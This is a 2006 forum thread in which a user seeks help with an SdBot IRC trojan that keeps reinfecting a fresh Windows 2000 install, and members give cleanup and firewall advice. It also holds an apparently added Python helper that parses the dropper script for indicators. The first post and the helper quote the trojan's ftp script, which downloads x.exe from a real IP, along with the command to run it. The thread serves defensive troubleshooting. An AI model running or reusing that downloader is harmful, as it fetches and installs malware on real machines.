
Microsoft Windows OS (XP/NT/Vista/Windows 7/8/9/10) Forum

This 33 message thread spans 2 pages (page 1 of 2).
How to Block IRC on Windows 2000?
Is there a way to turn off/ prohibit IRC on windows?
lmo4103

5+ Year Member



 
Msg#: 3116265 posted 2:26 am on Oct 11, 2006 (gmt 0)

Trojan irc.sdbot2 keeps planting files x.exe, i, a in system32.
Grisoft keeps catching it.

I open the file i in system32 with notepad and it has:
open 218.63.173.251 6497
user 1 1
get x.exe
quit

This on a fresh installation of windows 2000.
I have internet explorer security setting as high as it will go.
I am on the internet as a restricted user.
Even if I am not touching the pc, after a while it pops up again.

I just want to block unwanted files being deposited on my computer.

 

kaled

WebmasterWorld Senior Member kaled is a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3116265 posted 10:08 am on Oct 11, 2006 (gmt 0)

This on a fresh installation of windows 2000.

I assume you mean you reformatted and started again. If you simply reinstalled over the top this would almost never kill a virus, etc.

Assuming it was a clean reinstall, you obviously made the same mistake and got infected again.

1) You need to perform a complete antivirus scan.
2) Ditch Internet Explorer and use Opera or Firefox.
3) You probably need to install firewall software - ZoneAlarm is popular.

If you use this computer for banking or even buying stuff with credit cards, a complete scrub clean is advisable, however, before you do that, download Firefox, ZoneAlarm and AVG onto a cd or flash drive so that you can install them before connecting to the internet.

Kaled.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 1:15 pm on Oct 11, 2006 (gmt 0)

reformatted and started again

Yes!

The system takes up 2.6GB which includes a 2GB pagefile.sys.

And I know that I could use firefox.
Even if I am not touching the pc, after a while it pops up again

I know that I can try installing all kinds of software.
I know that I can (and do) use linux instead.

I have AVG anti-virus and AVG anti-spyware (formerly Ewido) installed.

But I want to know, on windows, how to turn off the service, port, or whatever that lets this IRC trojan guy plant stuff on my system.

kaled

WebmasterWorld Senior Member kaled is a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3116265 posted 1:41 pm on Oct 11, 2006 (gmt 0)

Have you disabled Messenger? Is that what you're after?

Kaled.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 2:22 pm on Oct 11, 2006 (gmt 0)

Yep. First thing I did was disable messenger.
AdministrativeTools->Services->Messenger [Stop / StartupType(manual)]

Nope, not what I was after.

Philosopher

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3116265 posted 2:52 pm on Oct 11, 2006 (gmt 0)

Whether it was a fresh installation or whatever, you are infected with a trojan. Specifically backdoor.irc.sdbot or a variation of it.

How did you get infected with the trojan on a fresh install? How old is the install? By that I mean, did you JUST format and reinstall or has it been a week or two? Somehow, somewhere you got infected.

Blocking IRC is simple enough, but you will need some type of firewall either hardware or software (such as zone alarm as was already recommended), but the reality is you have a trojan and need to get rid of that.

You are running an antivirus, but it sounds to me as if your system was either already infected when you installed the antivirus or your AV program isn't picking up the trojan. It's picking up its attempt to write to the system32 directory, but not the original trojan itself, which is what you need to get rid of.

Doing a quick search, I didn't find anything specific for irc.sdbot2, but many things for backdoor.irc.sdbot, which leads me to believe what you have may be a variant of the original sdbot trojan.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 3:18 pm on Oct 11, 2006 (gmt 0)

Less than 24 hrs. old.
And the AVG reported the virus within 30 minutes of the fresh install.
If I didn't know how I got infected with it, how would I know how I got infected with it?

Here is exactly what it says in AVG virus vault:
Trojan horse IRC/BackDoor.SdBot2.JJK
C:\WINNT\System32\x.exe
Moved object
infected

And you are right that a search does not turn up any information on this exact thing.
If you're interested in that file - i - in my first post, it is an ftp script and anyone could do:
ftp -n -s:i
to download the stupid x.exe file.

Blocking IRC is simple enough

How can I do it without installing more software?

[edited by: lmo4103 at 3:31 pm (utc) on Oct. 11, 2006]

Philosopher

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3116265 posted 3:29 pm on Oct 11, 2006 (gmt 0)

Since neither of us can find any information on that specific variation it is likely that the antivirus prog doesn't have the definition for that virus.

Did you have this problem prior to the reinstall or is this new since the format/reinstall?

It could be that you just had REALLY bad luck and got hit with some type of exploit right after you did the fresh install.

Did you download all the windows patches/updates immediately after you did the fresh install or did you wait (or even worse, have you not done that yet)?

My recommendation:

1) Get zone alarm, download it, save it to hard drive or burn it to a cd

2) Take the computer offline and do yet another fresh install. Format, reinstall, everything.

3) Install zone alarm

4) Reconnect and immediately go to windows update and get all the latest updates.

5) Install antivirus

6) Get Firefox and never use IE unless absolutely necessary.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 3:37 pm on Oct 11, 2006 (gmt 0)

It could be that you just had REALLY bad luck and got hit with some type of exploit right after you did the fresh install.

Did you download all the windows patches/updates immediately after you did the fresh install or did you wait (or even worse, have you not done that yet)?

Yes, bad luck!

I redid this 3 times and 3 times bad luck too!

Hey! At 56k, downloading all the windows patches is 12hrs. solid!
I have ordered SP4 cd.

But there should be a way to gain control of my own computer!

Philosopher

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3116265 posted 3:49 pm on Oct 11, 2006 (gmt 0)

I completely agree. Just very hard when your antivirus won't pick up the trojan. You could always try a different antivirus. There are a few free ones out there. Maybe the heuristics in another program would work better at finding the trojan.

Still, 3 times and this happens every time. That is bad... and you are positive you are completely formatting the harddrive on each reinstall?

That is crazy!

A couple of additional thoughts. Is this a standalone computer or is it networked with others that could be infecting it?

Are there any other programs you have installed that could be the source of the trojan? Something you have installed again with each fresh install?

[edited by: Philosopher at 3:59 pm (utc) on Oct. 11, 2006]

youfoundjake

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3116265 posted 4:32 pm on Oct 11, 2006 (gmt 0)

I would recommend doing a reboot into safe mode, run an antivirus sweep after the dats are updated, once the scan is complete, trojan found, deleted/removed, unplug the power cable, to kill anything being stored in memory.
Rinse and repeat as necessary until AV comes up clean.
Before doing all this, get zone alarm, free edition if you have to.
Stop all nonessential services, messenger, wi-fi, if it's a desktop... find a copy of msconfig, since w2k doesn't come with it, get it from win98 or winxp.
Run it, take a look at your startups, and hide all microsoft services and see what services are running.
Do you have another working computer? Anything you find suspect on the machine, google it. See what others say about it.
Maybe even after installing zonealarm and getting a copy of msconfig, updating AV, unplug the computer from internet/network
and do the AV scan with power cord removal each time.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 5:19 pm on Oct 11, 2006 (gmt 0)

Just very hard when your antivirus won't pick up the trojan.

You didn't read my first post.

Grisoft keeps catching it.

It does catch it!

Is there a way to turn off/ prohibit IRC on windows?

Review:
1. Format partition
2. Install windows 2000 from windows 2000 cd
3. Install Grisoft anti-virus
4. Update virus database
5. Grisoft catches Trojan horse IRC/BackDoor.SdBot2.JJK and puts it in virus vault

[edited by: lmo4103 at 5:25 pm (utc) on Oct. 11, 2006]

Philosopher

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3116265 posted 5:22 pm on Oct 11, 2006 (gmt 0)

I read your post just fine. As I said, it picks up the attempt to write the new files, but it is NOT picking up the actual trojan and getting rid of it, or you wouldn't keep having this problem.

Your AV program is picking up the symptom of the problem, not the cause and that is what you need to get rid of. If it was getting rid of the cause, you wouldn't keep having this problem.

I would try youfoundjake's suggestion and boot into safe mode and scan with your AV prog again and see if it finds it that way.

As to the IRC blocking, you can't do it from windows alone. You need a separate program that monitors and blocks internet traffic by blocking specific ports.

[edited by: Philosopher at 5:23 pm (utc) on Oct. 11, 2006]

kaled

WebmasterWorld Senior Member kaled is a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3116265 posted 6:03 pm on Oct 11, 2006 (gmt 0)

File and printer sharing?
Administrator password null/guessable?
Have you done a full virus scan?

Firewalls exist for a reason. I can see no valid reason for not installing Zone Alarm or a similar program.

If the trojan is being repeatedly installed (and caught by AVG) then either it is being installed directly (for which you must ensure file sharing is suitably blocked and install a firewall) or an attempt is being made periodically to reinstall it, either by another process or as a scheduled event.

If Zone Alarm does not block these attempts and they continue after a full virus scan, you have no alternative but to start again, and this time use proper security software from the start.

If you don't want to follow advice, then learn to live with the infection.

Kaled.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 6:18 pm on Oct 11, 2006 (gmt 0)

Administrator password is not null/ not guessable

Safe Mode -> Full System Scan -> Test Results -> No Virus Found

No Shared Printers / No Shared Folders

youfoundjake

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3116265 posted 7:12 pm on Oct 11, 2006 (gmt 0)

Going out a little bit further, any of the software that you are initially installing, did you get it from the vendor or download it off a p2p network? Are you using any key generators for licensing? That could be the culprit.
Download AdAware SE and do a scan in safe mode after updating its definitions as well.
Try and get a copy of hijackthis.exe and post the results here.
Also try scanning with a different AV, maybe NOD32. See what results they yield.
Just out of curiosity, when you format the partition, is it all one partition? Or is your hard drive broken up into multiple partitions? What file system are you selecting?
Get zonealarm.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 7:35 pm on Oct 11, 2006 (gmt 0)

No software installed except Explorer6, Grisoft anti-virus & anti-spyware, hijack-this

Logfile of HijackThis v1.97.7
Scan saved at 3:31:56 PM, on 10/11/2006
Platform: Windows 2000 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\Explorer.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
E:\download\searchalot\HijackThis.exe

O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "C:\Program Files\Grisoft\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O9 - Extra button: Related (HKLM)
O9 - Extra 'Tools' menuitem: Show &Related Links (HKLM)
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - [update.microsoft.com...]
O17 - HKLM\System\CCS\Services\Tcpip\..\{092648CB-F073-4C16-A579-6FFF6F5DB46D}: NameServer = 205.152.37.23 205.152.144.23

Downloading zone alarm - 30 minutes left

youfoundjake

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3116265 posted 7:50 pm on Oct 11, 2006 (gmt 0)

The E:\ drive, is that a physical partition, or is that a thumbdrive?
I take it that d:\ is the cdrom?

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 8:00 pm on Oct 11, 2006 (gmt 0)

C:\ drive - windows installation
D:\ drive - hardware device drivers collection
E:\ drive - data files
Safe Mode -> Full System Scan -> Test Results -> No Virus Found

Philosopher

WebmasterWorld Senior Member 10+ Year Member



 
Msg#: 3116265 posted 8:02 pm on Oct 11, 2006 (gmt 0)

when you have done your fresh installs. Are you also formatting the d & e drives? or only the c drive?

[edited by: Philosopher at 8:03 pm (utc) on Oct. 11, 2006]

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 8:05 pm on Oct 11, 2006 (gmt 0)

format c:
I'm not going to format my data.

youfoundjake

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3116265 posted 8:06 pm on Oct 11, 2006 (gmt 0)

Philosopher: Exactly my thought also, when you install the OS, and then install AV or any other programs, are they getting installed to D:\ or E:\?

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 8:09 pm on Oct 11, 2006 (gmt 0)

c:\ drive - system plus program files

youfoundjake

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3116265 posted 8:28 pm on Oct 11, 2006 (gmt 0)

Do you have a cd burner or dvd burner, more than one machine? Is there any way to copy the contents of d and e so that those drives can be formatted as well?
Did you get all the apps from the vendor?
Each time that AVG reports the trojan, is it the same filename, or is it changing?

kaled

WebmasterWorld Senior Member kaled is a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3116265 posted 10:48 pm on Oct 11, 2006 (gmt 0)

No Shared Folders
That's not what I meant. Under Windows NT, etc. the C: drive is notionally shared as C$, etc.

Is file/printer sharing enabled for your internet connection? You need to open the properties dialog for the connection.

Kaled.

youfoundjake

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3116265 posted 1:58 am on Oct 12, 2006 (gmt 0)

Unfortunately, when you remove the administrative share of c$ it appears again after the next reboot, unless there is some kind of hack out there, but off the top of my head, I couldn't think of it.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 11:01 pm on Oct 13, 2006 (gmt 0)

You can certainly remove administrative shares, but at a cost -- I tried that and many programs no longer worked.

Strange... Nobody can explain an IPSec policy to block IRC ports, or how to do it in TCP.

Waiting for SP4 CDs to arrive....
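The two things this thread never ties together are the dropper's ftp script from the first post (run with `ftp -n -s:i`) and the repeated question about blocking "IRC ports". The added example below is not code from the thread; it parses a Windows ftp.exe command script of that format, records the network indicators a defender would keep, and checks whether a port-based IRC block would have stopped the fetch. The script text is the one posted in the first message; the IRC port set and the egress allow-list are constructed for illustration.

```python
"""
Triage helper for a Windows ftp.exe command script (the `ftp -s:<file>` format).

Added example for this thread, not code from the original posts. The sample
script is copied from the first post (contents of C:\\WINNT\\System32\\i);
the port lists below are constructed for illustration.
"""
from dataclasses import dataclass, field
from typing import Optional

# Copied from the thread's first post: the dropper's ftp script `i`.
DROPPER_SCRIPT = """open 218.63.173.251 6497
user 1 1
get x.exe
quit
"""

# Constructed: the ports a typical "block IRC" rule would cover.
IRC_PORTS = frozenset({194, 6660, 6661, 6662, 6663, 6664, 6665,
                       6666, 6667, 6668, 6669, 6697, 7000})

# Constructed: a minimal egress allow-list (web only) for a default-deny policy.
WEB_ONLY_EGRESS = frozenset({80, 443})


@dataclass
class FtpScriptIndicators:
    host: Optional[str] = None
    port: int = 21                       # ftp.exe defaults to 21 when `open` gives no port
    username: Optional[str] = None
    files: list = field(default_factory=list)           # files the script pulls down
    other_commands: list = field(default_factory=list)  # anything else it issues


def parse_ftp_script(text: str) -> FtpScriptIndicators:
    """Extract host, port, user and fetched files from an ftp.exe script."""
    ind = FtpScriptIndicators()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split()
        cmd, args = parts[0].lower(), parts[1:]
        if cmd == "open" and args:
            ind.host = args[0]
            if len(args) > 1 and args[1].isdigit():
                ind.port = int(args[1])
        elif cmd == "user" and args:
            ind.username = args[0]       # the password (args[1]) is deliberately not kept
        elif cmd in ("get", "recv", "mget"):
            ind.files.extend(args)
        else:
            ind.other_commands.append(cmd)
    return ind


def port_block_stops_fetch(ind: FtpScriptIndicators, blocked_ports) -> bool:
    """A block-list rule only helps if the control connection hits a blocked port."""
    return ind.port in blocked_ports


def egress_allowlist_stops_fetch(ind: FtpScriptIndicators, allowed_ports) -> bool:
    """Default-deny egress: any port not explicitly allowed is blocked."""
    return ind.port not in allowed_ports


def triage(text: str, blocked_ports=IRC_PORTS, allowed_ports=WEB_ONLY_EGRESS) -> dict:
    """Indicators plus a verdict for each of the two firewalling approaches."""
    ind = parse_ftp_script(text)
    return {
        "host": ind.host,
        "port": ind.port,
        "files": list(ind.files),
        "irc_port_block_stops_it": port_block_stops_fetch(ind, blocked_ports),
        "egress_allowlist_stops_it": egress_allowlist_stops_fetch(ind, allowed_ports),
    }


if __name__ == "__main__":
    for key, value in triage(DROPPER_SCRIPT).items():
        print(f"{key}: {value}")
```

Run against the posted script, the parser reports the fetch going to 218.63.173.251 on TCP 6497 for x.exe: an FTP control connection on a non-standard port, not IRC traffic at all, so a rule that only blocks IRC ports leaves it untouched, while a default-deny egress policy with a short allow-list stops it. That is the practical difference between "block IRC" and the firewall the other posters kept recommending, whichever tool enforces it.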

kaled

WebmasterWorld Senior Member kaled is a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3116265 posted 12:16 pm on Oct 14, 2006 (gmt 0)

I wasn't suggesting removing administrative sharing. I was pointing out that it is possible to enable/disable file sharing on a specific network connection (i.e. your internet connection).

I doubt that this was the route by which the infection arrived (or continued to reappear) but since it only takes a few seconds to check I thought it was worth pointing out.

Kaled.

lmo4103

5+ Year Member



 
Msg#: 3116265 posted 4:43 pm on Oct 14, 2006 (gmt 0)

enable/disable file sharing on a specific network connection

How?

kaled

WebmasterWorld Senior Member kaled is a WebmasterWorld Top Contributor of All Time 10+ Year Member



 
Msg#: 3116265 posted 12:05 pm on Oct 15, 2006 (gmt 0)

I wrote
Is file/printer sharing enabled for your internet connection? You need to open the properties dialog for the connection.

From the Control Panel, open the Network Connections folder and then open the properties dialog for the network adapter. For Internet access, only the TCP/IP box needs to be ticked.

However, if the same network adapter is used to connect to the Internet and to a local area network, this may not be appropriate.

From memory, using a dialup adapter, you may be prompted to disable sharing but I'm not sure.

Kaled.
